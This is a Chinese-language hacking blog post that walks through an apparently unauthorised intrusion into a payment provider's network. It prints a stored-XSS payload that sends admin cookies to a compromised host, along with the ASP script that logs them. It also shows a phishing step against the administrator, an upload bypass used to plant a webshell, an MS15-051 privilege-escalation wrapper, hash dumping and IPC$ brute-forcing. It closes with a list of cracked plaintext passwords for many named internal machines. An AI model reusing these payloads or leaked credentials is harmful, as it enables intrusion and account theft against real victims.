WEBSHELL

今天是

关于我联系我网站地图

现在位置:首页 » 最新教程 » 一次简单的渗透报告

一次简单的渗透报告
作者:T.H.E   分类:最新教程   评论(2)   浏览(3159)   关键词: 渗透教程

转自:90sec.org

        账号审核文章

-----------------------------------------

先对网站踩点。

2.png

3.png

通过主页的“商家登陆口”,用测试账户进入后台,在https://XXXXXXXX/pay_gr/EMa1.asp存在文件上传,上传的文件将会被重命名为“emal_107”。用burpsuit抓包不能突破上传,将源码改为双文件上传也未能成功。

4.png

用蜘蛛找到后台管理员登陆地址(http://xxxxxxxxxxxxxxxxx/RVG.asp), 有三组邮箱服务器,”经销商登入”存在验证码和IP黑名单,”Web Mail”没有验证,到最后实在没思路可以whois查询邮箱进行爆破。

5.png

6.png

在https://xxxxxxxxxxxxx/pay_gr/GD_PAYVC.asp?VC=4578684&namebf=2015/7/23中有处”商家注记”,对输入参数没有任何过滤,存在储存型XSS

7.png

8.png

闭合标签,测试语句“</textarea><script>alert(“xss”)</script>”

9.png

成功触发。将远程JS写在一台肉鸡上,构造调用远程JS”<script>window.open('http://xxxxxxxxxxx/cookie.asp?msg='+document.cookie)</script>”

Cookie.asp:


<html>
<title>XssTest </title>
<body>
<%
testfile = Server.MapPath("code.txt") 
msg = Request("msg")
set fs = server.CreateObject("scripting.filesystemobject")
set thisfile = fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg&"")
thisfile.close
set fs = nothing
%>
</body>
</html>

自己测试的时候发现,这样构造存在跳转会被浏览器拦截,所以重新构造成<script>new image().src=” http://xxxxxxxx/cookie.asp?msg=”+document.cookie</script>
随后注册新邮箱,伪装成客户,给网站管理发送储存有XSS的网站,几小时后在肉鸡上有储存的cookie。 
更新cookie进入后台,点击"批次账单平台"跳转到("bill.xxxxxxx.net/up/index.php"), 在"上传档案"处存在"xls"文件上传点,可以通过burpsuit绕过此处的JS后缀检测,一开始将txt文本改后缀为xls不能成功,但存在文件内容检查,用"copy"将一句话插入xls文件尾,截断成功上传。

10.png


11.png



下面继续渗透 提权 

涉及到 提权无回显 解决方法!

----------------------------------------------------------------------------------------

进入webshell,调用CMD发现权限不够被禁用,于是上传CMD收集这台主机的信息


1.png

2 (1).png


4 (1).png

6 (1).png

3 (1).png

5 (1).png

“tasklist /svc”看见有Teamview,本以为可以用工具(https://www.91ri.org/13367.html)获得运行中Teamview账户密码,结果测试的时候发现会因为字体编码的问题,不支持繁体,所以放弃了。
看了补丁情况,打的挺多的,尝试了MS15-051,能成功创建进程,但是没有回显,需要创建ASP脚本,代码如下:

<%
set x=createobject("wscript.shell").exec("F:\www\new\Win32.exe ""whoami """)
 response.write (x.stdout.readall & x.stderr.readall)
%>

7 (1).png8 (1).png

然后用Pwdump抓取Hash,将结果重定向到1.txt,,再去跑Hash。

a.png

得到了”dragon”和”Administrator”,“uig_s2”,”uig_ftp4”,推测其他机器说不定有”uig_s1”,”uig_ftp1”,”uig_ftp2”,””uig_ftp3”,写了一组字典,然后写了”IPC$”批处理(http://pan.baidu.com/s/1ntKhQMP )去跑,得到了基本上所有机器的账户密码。
                                                                    -------------------\\UIG-FTP1--------------------
UserName: dragon                   LogonDomain: UIG-FTP1              password: 550802

                                                                   -------------------\\UIG-FTP2---------------------
UserName: Administrator           LogonDomain: UIG-FTP2               password: 2laigoolpc1
UserName: uig_ftp1                 LogonDomain: UIG-FTP2               password: 2laigoolpc1
UserName: uig_ftp3                 LogonDomain: UIG-FTP2               password: 2laigoolpc1
UserName: uig_ftp4                 LogonDomain: UIG-FTP2               password: 2laigoolpc1
UserName: dragon                  LogonDomain: UIG-FTP2               password: 2laigoolpc1

                                                                  -------------------\\UIG-FTP4-------------------- 
UserName: IUSR_NIRVANA-E0EE0CE      LogonDomain: UIG-FTP4             password: s*?e@4CI>3>2_s
UserName: Administrator                      LogonDomain: UIG-FTP4             password: 2laigoolpc1
UserName: dragon                              LogonDomain: UIG-FTP4             password: 550802
UserName: IWAM_NIRVANA-E0EE0CE    LogonDomain: UIG-FTP4             password: 136HN9&,4v!8uc
UserName: uig_s2                               LogonDomain: UIG-FTP4             password: 2laigoolpc1
UserName: uig_ftp4                             LogonDomain: ****                  password: 2laigoolpc1

                                                                 ------------------\\UIG-FTP3---------------------
UserName: Administrator            LogonDomain: UIG-FTP3              password: 2laigoolpc1
UserName: uig_ftp1                 LogonDomain: UIG-FTP3              password: 2laigoolpc1
UserName: uig_ftp4                 LogonDomain: UIG-FTP3              password: 2laigoolpc1
UserName: dragon                   LogonDomain: UIG-FTP3              password: 550802


                                                                          -------------------\\UIG-DELL--------------------
UserName: dragon                   LogonDomain: UIG-DELL              password: 550802


                                                               -------------------\\PS-5C6911--------------------
UserName: Administrator            LogonDomain: PS-5C6911             password: 2laigoolpc1


-------------------\\UIG-S2-----------------------
UserName: Administrator            LogonDomain: UIG-S2                password: 2laigoolpc1
UserName: dragon                   LogonDomain: UIG-S2                password: 550802


                                                                -------------------\\****-06E12A0969--------------
UserName: dragon                   LogonDomain: SMSE-06E12A0969       password: 550802


                                                                -------------------\\****-AFE0F3841B--------------
UserName: dragon                   LogonDomain: SMSE-AFE0F3841B       password: 550802


                                                                -------------------\\****-B08282F4D0--------------
UserName: dragon                   LogonDomain: SMSE-B08282F4D0       password: 550802


                                                                -------------------\\UIG-MOVPN2-------------------
UserName: Administrator            LogonDomain: UIG-MOVPN2            password: 2laigoolpc1

  
-------------------\\YUANSEN-C3E7540--------------
UserName: dragon                   LogonDomain: YUANSEN-C3E7540       password: 550802


                                                                --------------------\\UIG-PAYFTP-------------------
UserName: Administrator            LogonDomain: UIG-PAYFTP            password: 2laigoolpc1
UserName: dragon                   LogonDomain: UIG-PAYFTP            password: 550802

结果见上图,基本所有机器已经拿下,但是有个看起来价值很高的主机BILLPAY没有批处理爆破出来,ping下看了TTL,推测应该在同一个网关下,如果有闲心CAIN嗅探也有机会拿下,不过做到这一步也该全身而退了。
========================================

涵盖内容较丰富,故通过

涉及到的技术点有很多

1.xss 2.提权无回显解决方法 3. 爆破ipc


    转载分享请注明原文地址(WEBSHELL):https://www.webshell.ren/post-296.html
分享本文至:

发表评论:

ILOVETHE [回复该留言]
2015-10-04 01:21
好思路! 特别是提权无回显那里!我有时候用ms15也出现这种情况!果断收藏脚本学习了
T.H.E
[回复该留言]
2015-10-04 13:56
@ILOVETHE:EN

标签

  • 过狗总结
  • 免费资源
  • cms漏洞
  • 纯属扯淡
  • 渗透工具
  • 系统漏洞
  • 编辑器漏洞
  • 渗透教程
  • 提权exp分享
  • 站长资讯
  • 提权教程
  • 旁站工具
  • 一句话脚本
  • iis6写权限和遍历修复
  • 启动项目提权
  • 本人消失一段时间
  • asp大马后门
  • 搜狗问问存储型XSS
  • 批量discuz
  • 最新过狗菜刀
  • 7.2
  • 免杀pr
  • php读取iis配置脚本
  • 过安全宝
  • phpweb拿shell突破安全狗
  • Drupal
  • 实战某学校内网渗透
  • 7.31爆严重SQL注入漏洞【附exp】
  • 星外提权
  • windows
  • boot
  • manager
  • .htaccess
  • 301重定向
  • 免杀提权exp整理
  • 分享字典
  • 内网端口转发
  • 编辑器插一句话
  • wdcp虚拟主机管理系统
  • 过狗大马
  • CVE-2014-6332
  • 免费cdn加速
  • 附上exp
  • windows创建隐藏帐号
  • 指定渗透某大学
  • XYCMS漏洞整理
  • 内网渗透
  • emlog相册插件漏洞
  • 校园系统cms漏洞
  • Alan社工教程
  • 说明
  • pigcms&iwxcms漏洞利用工具
  • 批量上传黑页
  • IISPutScanner增强版
  • cc攻击防御
  • 椰树V1.9接口修复版
  • CVE-2014-3153
  • EXP
  • 搜索引擎分别CDN加速
  • MSSQL数据库提权
  • 新C段查询工具
  • 利用Apache解析漏洞拿下单子站
  • 内网渗透系列教程整理(原创)
  • 第一章节:讲解内网转发(原创)
  • sqlmap基本使用方法
  • 实战社工系列教程
  • cms漏洞集合
  • DDoS攻击
  • 12306信息泄密事件
  • 第二章节:内网域渗透(原创)
  • DDOS工具
  • wordpress上传漏洞
  • 支付宝自动转账支付代码
  • 突破SecureRDP拦截
  • 内网渗透第三章节1小节(原创)
  • 知名安全检测工具AWVSv9.5更新破解版本
  • 内网渗透第三章节0x2小节
  • 8.1权限提升漏洞POC
  • 渗透系列视频教程
  • 木马爆破工具集合
  • 记一次上传拿shell
  • 最新提星外主机系统思路(原创)
  • 过守护神总结
  • 对母校官方网站的一次渗透检测经历
  • 帝国CMS
  • 74CMS
  • 社会工程学系列
  • 文字语音调用代码
  • 法克论坛旁站查询工具
  • 数据泄露那些事情
  • Bitstamp
  • 翻墙网站
  • 黑掉ATM
  • aspcmsCSRF漏洞利用代码
  • 绕过各种CDN防护总结
  • 轻量级网站漏洞批量扫描器
  • 隐匿在Pastebin上的后门
  • 学校渗透系列一
  • ISIS黑客
  • SniffPass
  • -
  • 网络密码嗅探
  • 黑客组织“匿名者”
  • 谷歌把微软惹毛了
  • iPod
  • nano竟成ATM盗窃工具
  • 恶意软件可绕过密码
  • 马化腾QQ也曾被盗
  • 铁通被曝系统漏洞
  • Windows8.1漏洞
  • 白帽子借漏洞1元买几十万Model
  • Notepad++官网被圣战组织黑了
  • 苹果OSX的Spotlight文件搜索含泄漏用户隐私漏洞
  • 2014十大木马
  • 免费cdn加速整理
  • 韩国航空Facebook
  • Discuz!
  • X1.5前台getshell漏洞
  • 斯诺登又曝新料
  • 《英雄联盟》被曝植入木马
  • 2014年全球十大网络攻击事件
  • PolarSSL
  • 劫持301重定向快照流量
  • 过D盾的思路
  • 指定网站入侵
  • 比特币
  • 安全漏洞资讯
  • 黑客攻击
  • 自动批量SHELL一条龙
  • 域名爆破+Host查询
  • 黑客组织Anonymous
  • Burp
  • Suite
  • WordPress网站漏洞
  • 河马工具
  • kali系列教程
  • 网络资讯
  • MS15-077
  • MS15-051
  • 黑客交易吧2003渗透系统
  • 对国外黑客批量爆菊花
  • joomla反序列化漏洞
  • Dedecms延时注入漏洞
  • https
  • 安全狗
  • Nmap使用教程
  • linux
  • 工具收集
  • 腾讯安全网址拦截
  • 菜刀后门解析
    • 全球访问统计

        Free counters!
    • <-----------------------------------------------分界线----------------------------------------------->